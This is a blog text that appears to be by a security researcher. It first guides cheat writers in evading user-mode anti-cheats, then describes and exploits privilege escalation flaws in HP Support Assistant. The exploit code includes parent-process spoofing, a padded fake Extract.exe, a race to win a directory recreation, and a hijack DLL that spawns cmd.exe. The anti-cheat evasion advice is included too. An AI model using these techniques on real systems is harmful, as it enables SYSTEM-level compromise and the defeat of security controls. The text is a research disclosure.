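	static void Main()
	{
		EnumWindows((hWnd, _) =>
		{
			var title = new StringBuilder(256);
			if (GetWindowText(hWnd, title, title.Capacity) > 0 &&
				title.ToString().Contains("Cheat Engine")) // naive blacklist match
				Console.WriteLine($"Flagged window: {title}");
			return true; // continue enumeration
		}, IntPtr.Zero);
	}
}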

NtQuerySystemInformation

The next most lethal tool in the arsenal of these anti-cheats is NtQuerySystemInformation. This API allows even unprivileged processes to query a significant amount of information about what's going on in your computer.

There's too much data provided to cover all of it, but let's see some of the highlights of NtQuerySystemInformation.

  1. NtQuerySystemInformation with the class SystemProcessInformation provides a SYSTEM_PROCESS_INFORMATION structure, giving a significant amount of info about every process.
  2. NtQuerySystemInformation with the class SystemModuleInformation provides a RTL_PROCESS_MODULE_INFORMATION structure, giving a significant amount of info about every loaded driver.
  3. NtQuerySystemInformation with the class SystemHandleInformation provides a SYSTEM_HANDLE_INFORMATION structure, giving a list of every open handle in the system.
  4. NtQuerySystemInformation with the class SystemKernelDebuggerInformation provides a SYSTEM_KERNEL_DEBUGGER_INFORMATION structure, which tells the caller whether or not a kernel debugger is loaded (i.e. WinDbg KD).
  5. NtQuerySystemInformation with the class SystemHypervisorInformation provides a SYSTEM_HYPERVISOR_QUERY_INFORMATION structure, indicating whether or not a hypervisor is present.
  6. NtQuerySystemInformation with the class SystemCodeIntegrityPolicyInformation provides a SYSTEM_CODEINTEGRITY_INFORMATION structure, indicating whether or not various code integrity options are enabled (i.e. Test Signing, Debug Mode, etc).

This is only a small subset of what NtQuerySystemInformation exposes and it's important to remember these data sources while designing a secure cheat.
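
As a small concrete example of one of these queries, here's a sketch of the kernel-debugger check. SystemKernelDebuggerInformation is class 35 and returns two BOOLEANs:

using System;
using System.Runtime.InteropServices;

class KdCheckSketch
{
	[DllImport("ntdll.dll")]
	static extern int NtQuerySystemInformation(
		int SystemInformationClass, byte[] SystemInformation,
		int SystemInformationLength, out int ReturnLength);

	static void Main()
	{
		const int SystemKernelDebuggerInformation = 35;
		// BOOLEAN KernelDebuggerEnabled; BOOLEAN KernelDebuggerNotPresent;
		var info = new byte[2];
		int status = NtQuerySystemInformation(
			SystemKernelDebuggerInformation, info, info.Length, out _);
		if (status == 0) // STATUS_SUCCESS
			Console.WriteLine($"DebuggerEnabled={info[0] != 0}, DebuggerNotPresent={info[1] != 0}");
	}
}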

Circumventing Detection Vectors

Time for my favorite part. What's it worth if I just list all the possible ways for user-mode anti-cheats to detect you, without providing any solutions? In this section, we'll look over the detection vectors we mentioned above and see different ways to mitigate against them. First, let's summarize what we found.

  1. User-mode anti-cheats can use the filesystem to get a wide variety of access, primarily to access processes that are inaccessible via conventional methods (i.e OpenProcess).
  2. User-mode anti-cheats can use a variety of objects Windows exposes to get an insight into what is running in the current session and machine. Oftentimes there may be hard-to-track information leaks that anti-cheats can use to their advantage, primarily because unprivileged processes have a lot of query power.
  3. User-mode anti-cheats can enumerate the windows of the current session to detect and flag windows that match the attributes of blacklisted applications.
  4. User-mode anti-cheats can utilize the enormous amount of data the NtQuerySystemInformation API provides to peer into what's going on in the system.

Circumventing Filesystem Detection Vectors

To restate the investigation section regarding filesystems: we found that user-mode anti-cheats can utilize the filesystem to get access they otherwise would not have. How can an attacker evade filesystem-based detection routines? By abusing security descriptors.

Security descriptors are what truly dictate who has access to an object, and on the filesystem this becomes especially important in regard to who can read a file. If the user-mode anti-cheat does not have permission to read a file based on its security descriptor, then it cannot read that file. What I mean is: if you run a process as Administrator, preventing the anti-cheat from opening the process, and then remove access to the process's file, how can the anti-cheat read it? Abusing security descriptors this way allows an attacker to evade detections that involve opening processes through the filesystem.
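
As a minimal sketch of the direct approach (run it elevated; the path and the exact rights to deny are illustrative), adding a deny ACE for the built-in Users group takes only a few lines of C#:

using System.IO;
using System.Security.AccessControl;
using System.Security.Principal;

class DenyAceSketch
{
	static void DenyUsersRead(string path)
	{
		var info = new FileInfo(path);
		FileSecurity acl = info.GetAccessControl();

		// Deny READ/EXECUTE to BUILTIN\Users; deny ACEs take precedence
		// over allow ACEs, so unprivileged scanners lose access to the file.
		acl.AddAccessRule(new FileSystemAccessRule(
			new SecurityIdentifier(WellKnownSidType.BuiltinUsersSid, null),
			FileSystemRights.Read | FileSystemRights.ReadAndExecute,
			AccessControlType.Deny));
		info.SetAccessControl(acl);
	}
}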

You may feel wary when thinking about restricting unprivileged access to your process, but there are many subtle ways to achieve the same result. Instead of directly setting the security descriptor of the file or folder, why not find existing folders that have restricted security descriptors?

For example, the directory C:\Windows\ModemLogs already prevents unprivileged access.

The directory by default disallows unprivileged applications from accessing it, requiring at least Administrator privileges. What if you put your naughty binary in there?

Another trick to evade information leaks in places such as the Device directory or BaseNamedObjects directory is to abuse their security descriptors to block access to the anti-cheat. I strongly advise that you utilize a new sandbox account; alternatively, you can set the permissions of directories such as the Device directory to deny access to certain security principals.

Using security descriptors, we can block access to these directories to prevent anti-cheats from traversing them. All we need to do in the example above is run the game as this new user, and the anti-cheat will not have access to the Device directory. Since security descriptors control a significant amount of access in Windows, it's important to understand how we can leverage them to cut off anti-cheats from crucial data sources.

The solution of abusing security descriptors isn't perfect, but the point I'm trying to make is that there is a lot of room for becoming undetected. Given that most anti-cheats have to deal with a mountain of compatibility issues, it's unlikely that most abuse would be detected.

Circumventing Object Detection and Window Detection

I decided to include both Object and Window detection in this section because the circumvention can overlap. Starting with Object detection, especially when dealing with tools that you didn't create, understanding the information leaks a program has is the key to evading detection.

The examples brought up in the investigation were the Cheat Engine driver's device name and IDA's mutex. If you're using someone else's software, it's very important that you look for information leaks, primarily because it may not have been designed with preventing information leaks in mind.

For example, I was able to make TitanHide undetected by several user-mode anti-cheat platforms by:

  1. Utilizing the previous filesystem trick to prevent access to the driver file.
  2. Changing the pipe name of TitanHide.
  3. Changing the log output of TitanHide.

These steps are simple and not difficult to conceptualize. Read through the source code, understand the detection surface, and harden those surfaces. It can be as simple as changing a few names to become undetected.

When creating your own software that has the goal of combating user-mode anti-cheats, information leaks should be a key step when designing the application. Understanding the internals of Windows can help a significant amount, because you can better understand different types of leaks that can occur.

A generic circumvention for both object detection and window detection is the abuse of multiple sessions. The previously mentioned EnumWindows API can only enumerate windows in the current session, and unprivileged processes from one session can't access another session's objects. How do you use multiple sessions? There are many ways, but here's the trick I used to bypass a significant number of user-mode anti-cheats.

  1. I created a new user account.
  2. I set the security descriptor of my naughty tools to be inaccessible by an unprivileged context.
  3. I ran any of my naughty tools by switching users and running it as that user.

Those three simple steps are what allowed me to use even the most common utilities such as Cheat Engine against some of the top user-mode anti-cheats. Unprivileged processes cannot access the processes of another user and they cannot enumerate any objects (including windows) of another session. By switching users, we're entering another session, significantly cutting off the visibility anti-cheats have.

A mentor of mine, Alex Ionescu, pointed out a different approach to preventing an unprivileged process from accessing windows in the current session. He suggested that you can put the game process into a job and then set the JOB_OBJECT_UILIMIT_HANDLES UI restriction. This would restrict any processes in the job from accessing "USER" handles of processes outside of the job, meaning that the user-mode anti-cheat could not access windows in the same session. The drawback of this method is that the anti-cheat could detect this restriction and could choose to crash/flag you. The safest method is generally not touching the process itself and instead evading detection using generic methods (i.e switching sessions).

Circumventing NtQuerySystemInformation

Unlike the previous circumvention methods, evading NtQuerySystemInformation is not as easy. In my opinion, the safest way to evade detection routines that utilize NtQuerySystemInformation is to look at the different information classes that may impact you and ensure you do not have any unique information leaks through those classes.

Although NtQuerySystemInformation does give a significant amount of access, it's important to note that the data returned is often not detailed enough to be a significant threat to cheaters.

If you would like to restrict user-mode anti-cheat access to the API, there is a solution. NtQuerySystemInformation respects the integrity level of the calling process and significantly limits access for Restricted Callers, primarily those with a token below the medium integrity level. This sandboxing can allow us to cut off a significant amount of access from the user-mode anti-cheat, but at the cost of a potential detection vector. The anti-cheat could choose to crash if it's run under medium integrity level, which would stop this trick.

When at a low integrity level, processes:

  1. Cannot query handles.
  2. Cannot query kernel modules.
  3. Can only query other processes with equal or lower integrity levels.
  4. Can still query if a kernel debugger is present.

When testing with Process Hacker, I found that some games with user-mode anti-cheats crashed outright, perhaps because they received an ACCESS_DENIED error in one of their detection routines. An important reminder, as with the previous job-limit circumvention method: since this trick does directly touch the process, it is possible anti-cheats will simply crash or flag you for setting their integrity level. Although I would strongly suggest you develop your cheats in a manner that does not allow for detection via NtQuerySystemInformation, this sandboxing trick is a way of suppressing some of the leaked data.

Test Signing

If I haven't yet convinced you that user-mode anti-cheats are easy to circumvent, it gets better. On all of the user-mode anti-cheats I tested, test signing was permitted, allowing essentially any driver to be loaded, including ones you create.

If we go back to our scope, drivers really only have a few detection vectors:

  1. User-mode anti-cheats can utilize NtQuerySystemInformation to get basic information on kernel modules. Specifically, the anti-cheat can obtain the kernel base address, the module size, the path of the driver, and a few other properties. You can view exactly what's returned in the definition of RTL_PROCESS_MODULE_INFORMATION. This can be circumvented by basic security practices such as ensuring the data returned in RTL_PROCESS_MODULE_INFORMATION is unique or by modifying the anti-cheat's integrity level.
  2. User-mode anti-cheats can query the filesystem to obtain the driver contents. This can be circumvented by changing the security descriptor of the driver.
  3. User-mode anti-cheats can hunt for information leaks by your driver (such as using a blacklisted device name) to identify it. This can be circumvented by designing your driver to be secure by design (unlike many of these anti-cheats).

Circumventing the above checks will result in an undetected kernel driver. The information leak prevention can be difficult; however, if you know what you're doing, you should understand what APIs may leak certain information accessible by these anti-cheats.

I hope I have taught you something new about combating user-mode anti-cheats and demystified their capabilities. User-mode anti-cheats come with the benefit of being a less invasive product that doesn't infringe on the privacy of players, but at the same time they are incredibly weak and limited. They can appear scary at first, given their usual advantage in detecting "internal" cheaters, but we must realize how weak their position truly is. Unprivileged processes are, as the name suggests, unprivileged. Stop wasting time treating these products as any sort of challenge; use the operating system's security controls to your advantage. User-mode anti-cheats have already lost, so quit acting like they're any stronger than they really are.

Several Critical Vulnerabilities on most HP machines running Windows

3 April 2020 at 12:31

I always have considered bloatware a unique attack surface. Instead of the vulnerability being introduced by the operating system, it is introduced by the manufacturer that you bought your machine from. More tech-savvy folk might take the initiative and remove the annoying software that came with their machine, but will an average consumer? Pre-installed bloatware is the most interesting, because it provides a new attack surface impacting a significant number of users who leave the software on their machines.

For the past year, I've been researching bloatware created by popular computer manufacturers such as Dell and Lenovo. Some of the vulnerabilities I have published include the Remote Code Execution and Local Privilege Escalation vulnerabilities I found in Dell's own pre-installed bloatware. More often than not, I have found that this class of software has little-to-no security oversight, leading to poor code quality and a significant number of security issues.

In this blog post, we'll be looking at HP Support Assistant which is "pre-installed on HP computers sold after October 2012, running Windows 7, Windows 8, or Windows 10 operating systems". We'll be walking through several vulnerabilities taking a close look at discovering and exploiting them.

General Discovery

Before being able to understand how each vulnerability works, we need to understand how HP Support Assistant works on a conceptual level. This section will document the background knowledge needed to understand every vulnerability in this report except for the Remote Code Execution vulnerability.

Opening a few of the binaries in dnSpy revealed that they were "packed" by SmartAssembly. This is an ineffective attempt at security through obscurity as de4dot quickly deobfuscated the binaries.

On start, HP Support Assistant will begin hosting a "service interface" which exposes over 250 different functions to the client. This contract interface is exposed by a WCF Net Named Pipe for access on the local system. In order for a client to connect to the interface, the client creates a connection to the interface by connecting to the pipe net.pipe://localhost/HPSupportSolutionsFramework/HPSA.

This is not the only pipe created. Before a client can call on any of the useful methods in the contract interface, it must be "validated". The client does this by calling on the interface method StartClientSession with a random string as the first argument. The service will take this random string and start two new pipes for that client.
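
To make the connection path concrete, here's a hedged sketch of a client; the contract interface name and the exact StartClientSession signature are my assumptions for illustration (the real contract exposes over 250 methods):

using System;
using System.ServiceModel;

[ServiceContract]
interface IHpServiceContract // hypothetical name for the real contract interface
{
	[OperationContract]
	void StartClientSession(string randomString); // assumed signature
}

class PipeClientSketch
{
	static void Main()
	{
		// Connect to the WCF Net Named Pipe endpoint hosted by the service.
		var factory = new ChannelFactory<IHpServiceContract>(
			new NetNamedPipeBinding(),
			new EndpointAddress("net.pipe://localhost/HPSupportSolutionsFramework/HPSA"));

		IHpServiceContract channel = factory.CreateChannel();
		// The random string determines the Send_HPSA_/Receive_HPSA_ pipe names.
		channel.StartClientSession(Guid.NewGuid().ToString("N"));
	}
}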

The first pipe is called \\.\pipe\Send_HPSA_[random string] and the second is called \\.\pipe\Receive_HPSA_[random string]. As the names imply, HP uses two different pipes for sending and receiving messages.

After creating the pipes, the client will send the string "Validate" to the service. When the service receives any message over the pipe except "close", it will automatically validate the client – regardless of the message contents ("abcd" will still cause validation).

The service starts by obtaining the process ID of the process it is communicating with using GetNamedPipeClientProcessId on the pipe handle. The service then grabs the full image file name of the process for verification.

The first piece of verification is to ensure that the "main module" property of the C# Process object equals the image name returned by GetProcessImageFileName.

The second verification checks that the process file is not only signed, but the subject of its certificate contains hewlett-packard, hewlett packard, or o=hp inc.
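
A sketch of what that certificate check plausibly looks like (my reconstruction, not HP's decompiled code; the subject strings are the ones named above):

using System;
using System.Security.Cryptography.X509Certificates;

class CertSubjectCheckSketch
{
	static bool IsHpSigned(string path)
	{
		try
		{
			// Pull the Authenticode signer certificate off the file.
			var cert = new X509Certificate2(X509Certificate.CreateFromSignedFile(path));
			string subject = cert.Subject.ToLower();
			return subject.Contains("hewlett-packard")
				|| subject.Contains("hewlett packard")
				|| subject.Contains("o=hp inc");
		}
		catch (Exception)
		{
			return false; // unsigned or unreadable file
		}
	}
}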

The next verification checks the process image file name for the following:

  1. The process path is "rooted" (not a relative path).
  2. The path does not start with "\".
  3. The path does not contain "..".
  4. The path does not contain ".\".
  5. The path is not a reparse or junction point.

The last piece of client verification is checking that each parent process passes the previous verification steps AND starts with:

  1. C:\Program Files[ (x86)]
  2. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\
  3. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Solutions\
  4. or C:\Windows (excluding C:\Windows\Temp)

If you pass all of these checks, then your "client session" is added to a list of valid clients. A 4-byte integer is generated as a "client ID" which is returned to the client. The client can obtain the required token for calling protected methods by calling the interface method GetClientToken and passing the client ID it received earlier.

One extra check is done on the process file name. If the process file name is either:

  1. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\HPSF.exe
  2. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\ProductConfig.exe
  3. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\HPSFViewer.exe

Then your token is added to a list of "trusted tokens". Using this token, the client can now call certain protected methods.

Before we head into the next section, there is another key design concept important to understanding almost all of the vulnerabilities. In most of the "service methods", the service accepts several parameters about an "action" to take via a structure called the ActionItemBase. This structure has several pre-defined properties, for a variety of methods, that are set by the client. Anytime you see a reference to an "action item base property", understand that this property is under the complete control of an attacker.
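
For illustration, here is a hypothetical slice of that structure. Only ExecutableName and SPName are named in this article; every property is client-controlled:

// Hypothetical reconstruction for illustration; the real property set is much larger.
class ActionItemBase
{
	public string ExecutableName { get; set; } // consumed by InstallSoftPaq (see below)
	public string SPName { get; set; }         // fallback used to build the .exe name
	// ... dozens more client-controlled properties
}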

In the following sections, we’ll be looking at several vulnerabilities found and the individual discovery/exploitation process for each one.

General Exploitation

Before getting into specific exploits, being able to call protected service methods is our number one priority. Most functions in the WCF Service are "protected", which means we need to be able to call them to maximize the potential attack surface. Let’s take a look at some of the mitigations discussed above and how we can bypass them.

A real issue for HP is that the product is insecure by design. Some mitigations do serve a purpose, such as the integrity checks mentioned in the previous section, but HP is fighting a battle they’ve already lost. Core components, such as HP Web Product Detection, rely on access to the service yet run in an unprivileged context. The way the HP service is currently designed, it must be able to receive messages from unprivileged processes; as long as that is true, there will always be a way to talk to the service.

The first choice I made was adding the HP.SupportFramework.ServiceManager.dll binary as a reference to my C# proof-of-concept payload, because rewriting the entire client portion of the service would be a significant waste of time. There were no real checks in the binary itself, and even if there were, it wouldn't have mattered because it was a client-side DLL I controlled. The important checks are on the "server" or service side, which handles incoming client connections.

The first important check to bypass is the second one, where the service checks that our binary is signed by an HP certificate. This is simple to bypass because we can just fake being an HP binary. There are many ways to do this (e.g. Process Doppelgänging), but the route I took was starting a signed HP binary suspended and then injecting my malicious C# DLL. This gave me the context of being from an HP program because I started the signed binary at its real path (in Program Files (x86), etc.).

To bypass the checks on the parent processes of the connecting client process, I opened a PROCESS_CREATE_PROCESS handle to the Windows Explorer process and used the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute to spoof the parent process.
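
For reference, here is a minimal Win32 C++ sketch of that parent-spoofing technique, assuming explorerPid has already been looked up; error handling is trimmed for brevity.

// Minimal sketch (Win32 C++): spoof explorer.exe as the parent of a new
// process using PROC_THREAD_ATTRIBUTE_PARENT_PROCESS.
#include <windows.h>

bool SpawnWithSpoofedParent(DWORD explorerPid, wchar_t* commandLine)
{
    HANDLE parent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, explorerPid);
    if (!parent) return false;

    // Size query, then build an attribute list holding the fake parent.
    SIZE_T attrSize = 0;
    InitializeProcThreadAttributeList(nullptr, 1, 0, &attrSize);
    auto attrs = reinterpret_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(
        HeapAlloc(GetProcessHeap(), 0, attrSize));
    InitializeProcThreadAttributeList(attrs, 1, 0, &attrSize);
    UpdateProcThreadAttribute(attrs, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                              &parent, sizeof(parent), nullptr, nullptr);

    STARTUPINFOEXW si = {};
    si.StartupInfo.cb = sizeof(si);
    si.lpAttributeList = attrs;
    PROCESS_INFORMATION pi = {};

    // Suspended, so the malicious DLL can be injected before it runs.
    BOOL ok = CreateProcessW(nullptr, commandLine, nullptr, nullptr, FALSE,
                             EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED,
                             nullptr, nullptr, &si.StartupInfo, &pi);

    DeleteProcThreadAttributeList(attrs);
    HeapFree(GetProcessHeap(), 0, attrs);
    CloseHandle(parent);
    if (ok) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); }
    return ok == TRUE;
}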

Feel free to look at the other mitigations; this method bypasses all of them, maximizing the attack surface of the service.

Local Privilege Escalation Vulnerabilities

Discovery: Local Privilege Escalation #1 to #3

Before getting into exploitation, we need to review context required to understand each vulnerability.

Let’s start with the protected service method named InstallSoftPaq. I don’t really know what "SoftPaq" stands for, maybe software package? Regardless, this method is used to install HP updates and software.

The method takes three arguments. First is an ActionItemBase object which specifies several details about what to install. Second is an integer which specifies the timeout for the installer that is going to be launched. Third is a Boolean indicating whether or not to install directly; it has little to no purpose because the service method uses the ActionItemBase to decide if it's installing directly.

The method begins by checking whether or not the action item base ExecutableName property is empty. If it is, the executable name will be resolved by concatenating both the action item base SPName property and .exe.

If the action item base property SilentInstallString is not empty, it will take a different route for executing the installer. This method is assumed to be the "silent install" method whereas the other one is a direct installer.

Silent Install

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

The method will then check to make sure that C:\Windows\TEMP + the action item base property ExecutableName exists as a file. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

If the SilentInstallString property of the action item base contains the SPName property + .exe, the current directory for the new process will be the temporary directory. Otherwise, the method will set the current directory for the new process to C:\swsetup\ + the ExecutableName property.

If the latter route is taken, the service will start the previously copied Extract.exe binary and attempt to extract the download into the current directory + the ExecutableName property after stripping .exe from the string. If the extraction folder already exists, it is deleted before execution. When the Extract.exe binary has finished executing, the sub-method will return true. If the extraction method returns false, typically due to an exception, the download is stopped in its tracks.

After determining the working directory and extracting the download if necessary, the method splits the SilentInstallString property into an array using a double quote as the delimiter.

If the silent install split array has a length less than 2, the installation is stopped in its tracks with an error indicating that the silent install string is invalid. Otherwise, the method will check if the second element (index 1) of the split array contains .exe, .msi, or .cmd. If it does not, the installation is stopped.

The method will then take the second element and concatenate it with the previously resolved current directory + the executable name with .exe stripped + \ + the second element. For example, if the second element was cat.exe and the executable name property was cats, the resolved path would be the current directory + \cats\cat.exe. If this resolved path does not exist, the installation stops.

If you passed the previous checks and the resolved path exists, the binary pointed to by the resolved path is executed. The arguments passed to the binary are the silent install string with the resolved path removed from it. The installation timeout (in minutes) is dictated by the second argument passed to InstallSoftPaq.

After the binary has finished executing or been terminated for passing the timeout period, the method returns the status of the execution and ends.

Direct Install

When no silent install string is provided, a method named StartInstallSoftpaqsDirectly is executed.

The method will then check to make sure that the result of the Path.Combine method with C:\Windows\TEMP and the action item base property ExecutableName as arguments exists as a file. If the file does not exist, the method stops and returns with a failure. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

The method will then create a new scheduled task for the current time. The task is set to be executed by the Administrators group and if an Administrator is logged in, the specified program is executed immediately.

Exploitation: Local Privilege Escalation #1 to #3

Local Privilege Escalation #1

The first simple vulnerability causing Local Privilege Escalation is in the silent install route of the exposed service method named InstallSoftPaq. Quoting the discovery portion of this section,

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

This is where the bug lies. Unprivileged users can write to C:\Windows\TEMP, but cannot enumerate the directory (thanks Matt Graeber!). This allows an unprivileged attacker to write a malicious binary named Extract.exe to C:\Windows\TEMP, appending enough NULL bytes to match the size of the actual Extract.exe in HP's installation directory.
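
Here is a minimal C++17 sketch of planting the padded binary, under the assumption that we can read the legitimate Extract binary from HP's installation directory to learn its length; the payload path is illustrative.

// Minimal sketch (C++17): plant a malicious Extract.exe in C:\Windows\TEMP,
// padded with NULL bytes so its length matches the legitimate Extract binary.
#include <filesystem>
#include <fstream>
#include <iterator>
#include <vector>

namespace fs = std::filesystem;

void PlantPaddedExtract(const fs::path& maliciousExe,
                        const fs::path& legitimateExtract)
{
    const auto targetSize = fs::file_size(legitimateExtract);

    std::ifstream in(maliciousExe, std::ios::binary);
    std::vector<char> payload((std::istreambuf_iterator<char>(in)),
                              std::istreambuf_iterator<char>());

    // The service only compares lengths, not contents, so NULL padding works.
    if (payload.size() < targetSize)
        payload.resize(static_cast<size_t>(targetSize), '\0');

    std::ofstream out("C:\\Windows\\TEMP\\Extract.exe", std::ios::binary);
    out.write(payload.data(), static_cast<std::streamsize>(payload.size()));
}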

Here are the requirements of the attacker-supplied action item base:

  1. The action item base property SilentInstallString must be defined to something other than an empty string.
  2. The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
  3. This file must also be signed by HP.
  4. The action item base property SilentInstallString must not contain the value of the property SPName + .exe.

If these requirements are passed, when the method attempts to start the extractor, it will start our malicious binary as NT AUTHORITY\SYSTEM achieving Local Privilege Escalation.

Local Privilege Escalation #2

The second Local Privilege Escalation vulnerability again lies in the silent install route of the exposed service method named InstallSoftPaq. Let’s review what requirements we need to pass in order to have the method start our malicious binary.

  1. The action item base property SilentInstallString must be defined to something other than an empty string.
  2. The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
  3. This file must also be signed by HP.
  4. If the SPName property + .exe is in the SilentInstallString property, the current directory is C:\Windows\TEMP. Otherwise, the current directory is C:\swsetup\ + the ExecutableName property with .exe stripped. The resulting path does not need to exist.
  5. The action item base property SilentInstallString must have at least one double quote.
  6. The action item base property SilentInstallString must have a valid executable name after the first double quote (e.g. a valid value could be something"cat.exe). This executable name is the "binary name".
  7. The binary name must contain .exe or .msi.
  8. The file at current directory + \ + the binary name must exist.

If all of these requirements are passed, the method will execute the binary at current directory + \ + binary name.

The eye-catching part about these requirements is that we can cause the "current directory", where the binary gets executed, to be a directory path that can be created with low privileges. Any user is able to create folders in the C:\ directory; therefore, we can create the path C:\swsetup and have the current directory be that.

We need to make sure not to forget that the executable name has .exe stripped from it and this directory is created within C:\swsetup. For example, if we pass the executable name as dog.exe, we can have the current directory be C:\swsetup\dog. The only requirement if we go this route is that the same executable name exists in C:\Windows\TEMP. Since unprivileged users can write into the C:\Windows\TEMP directory, we can simply write a dog.exe into the directory and pass the first few checks. The best part is, the binary in the temp directory does not need to be the same binary as in the C:\swsetup\dog directory. This means we can place a signed HP binary in the temp directory and a malicious binary in our swsetup directory.

A side-effect of having swsetup as our current directory is that the method will first try to "extract" the file in question. In the process of extracting the file, the method first checks if the swsetup directory exists. If it does, it deletes it. This is perfect for us, because the deletion tells us when the function is about to execute, allowing us to quickly re-create the directory and copy in the malicious binary.

After extraction is attempted and after we place our malicious binary, the method determines the filename to execute by taking the string after the first double quote character in the SilentInstallString parameter. This means if we set the parameter to be a"BadBinary.exe, the complete path for execution will be the current directory + BadBinary.exe. Since our current directory is C:\swsetup\dog, the complete path to the malicious binary becomes C:\swsetup\dog\BadBinary.exe. The only check on the file specified after the double quote is that it exists; there are no signature checks.

Once the final path is determined, the method starts the binary. For us, this means our malicious binary is executed.

To review the example above:

  1. We place a signed HP binary named dog.exe in C:\Windows\TEMP.
  2. We create the directory chain C:\swsetup\dog.
  3. We pass in an action item base with the ExecutableName property set to dog.exe, the SPName property set to anything but BadBinary, and the SilentInstallString property set to a"BadBinary.exe.
  4. We monitor the C:\swsetup\dog directory until it is deleted.
  5. Once we detect that the dog folder is deleted, we immediately recreate it and copy in our BadBinary.exe (see the polling sketch below).
  6. Our BadBinary.exe gets executed with SYSTEM permissions.
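
A minimal C++17 sketch of steps 4 and 5, using a simple polling loop to catch the deletion; the attacker-side payload path is illustrative.

// Minimal sketch (C++17): poll for the deletion of C:\swsetup\dog, then
// immediately recreate it and drop BadBinary.exe inside before the service
// resolves the final path.
#include <filesystem>
#include <windows.h>

namespace fs = std::filesystem;

void WinTheRace()
{
    const fs::path dir = "C:\\swsetup\\dog";

    // Wait for the service to delete the directory during "extraction".
    while (fs::exists(dir))
        Sleep(1);

    // Recreate the directory and plant the payload before execution.
    fs::create_directories(dir);
    fs::copy_file("C:\\attacker\\BadBinary.exe", dir / "BadBinary.exe",
                  fs::copy_options::overwrite_existing);
}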

Local Privilege Escalation #3

The next Local Privilege Escalation vulnerability is accessible via both the previously covered protected method InstallSoftpaq and InstallSoftpaqDirectly. This exploit lies in the previously mentioned direct install method.

This method starts off similarly to its silent install counterpart by concatenating C:\Windows\TEMP and the action item base ExecutableName property. Again similarly, the method will verify that the path specified is a binary signed by HP. The mildly interesting difference here is that instead of doing an unsafe concatenation operation by just adding the two strings using the + operator, the method uses Path.Combine, the safe way to concatenate path strings.

Path.Combine is significantly safer than just adding two path strings because it checks for invalid characters and will throw an exception if one is detected, halting most path manipulation attacks.

What this means for us as an attacker is that our ExecutableName property cannot escape the C:\Windows\TEMP directory, because / is one of the blacklisted characters.

This isn’t a problem, because unprivileged processes CAN write directly to C:\Windows\TEMP. This means we can place a binary to run right into the TEMP directory and have this method eventually execute it. Here’s the small issue with that: the HP certificate check.

How do we get past that? We can place a legitimate HP binary into the temporary directory for execution, but we need to somehow hijack its context. In the beginning of this report, we outlined how we can enter the context of a signed HP binary by injecting into it; this isn’t exactly possible here because the service is the one creating the process. What we CAN do is some simple DLL Hijacking.

DLL Hijacking means we place a dynamically loaded library that is imported by the binary into the current directory of the signed binary. One of the first locations Windows searches when loading a dynamically linked library is the current directory. When the signed binary attempts to load that library, it will load our malicious DLL and give us the ability to execute in its context.

I picked at random from the abundant supply of signed HP binaries. For this attack, I went with HPWPD.exe which is HP’s "Web Products Detection" binary. A simple way to find a candidate DLL to hijack is by finding the libraries that are missing. How do we find "missing" dynamically loaded libraries? Procmon to the rescue!

Using three simple filters and then running the binary, we’re able to easily determine a missing library.

Now we have a few candidates here. C:\VM is the directory where the binary resides on my test virtual machine. Since the first path is not in the current directory, we can disregard that. From there on, we can see plenty of options. Each one of those CreateFile operations usually means that the binary was attempting to load a dynamically linked library and was checking the current directory for it. For attacking purposes, I went with RichEd20.dll just because it's the first one I saw.

To perform this Local Privilege Escalation attack, all we have to do is write a malicious DLL, name it RichEd20.dll, and stick it with the binary in C:\Windows\TEMP. Once we call the direct install method passing the HPWPD.exe binary as the ExecutableName property, the method will start it as the SYSTEM user and the binary will load our malicious DLL, escalating our privileges.
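
A minimal sketch of what such a RichEd20.dll stand-in could look like; here it just spawns cmd.exe as a visible proof of execution (a real payload would do something quieter).

// Minimal sketch (Win32 C++): when HPWPD.exe loads this DLL from
// C:\Windows\TEMP as SYSTEM, DllMain runs in that context.
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
    if (reason == DLL_PROCESS_ATTACH)
    {
        STARTUPINFOW si = { sizeof(si) };
        PROCESS_INFORMATION pi = {};
        wchar_t cmd[] = L"cmd.exe";
        if (CreateProcessW(nullptr, cmd, nullptr, nullptr, FALSE,
                           CREATE_NEW_CONSOLE, nullptr, nullptr, &si, &pi))
        {
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }
    }
    return TRUE;
}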

Discovery: Local Privilege Escalation #4

The next protected service method to look at is DownloadSoftPaq.

To start with, this method takes in an action item base, a String parameter called MD5URL, and a Boolean indicating whether or not this is a manual installation. As an attacker, we control all three of these parameters.

If we pass in true for the parameter isManualInstall AND the action item base property UrlResultUI is not empty, we’ll use this as the download URL. Otherwise, we’ll use the action item base property UrlResult as the download URL. If the download URL does not start with http, the method will force it to start with http://.

This is an interesting check. The method will make sure that the Host of the specified download URL ends with either .hp.com OR .hpicorp.net. If this check fails, the download will not continue.

Another check is making a HEAD request to the download URL and ensuring the response header Content-Length is greater than 0. If an invalid content length header is returned, the download won’t continue.

The location of the download is the combination of C:\Windows\TEMP and the action item base ExecutableName property. The method does not use safe path concatenation and instead uses raw string concatenation. After verifying that there is an internet connection, that the content length of the download URL is greater than 0, and that the URL is "valid", the download is initiated.

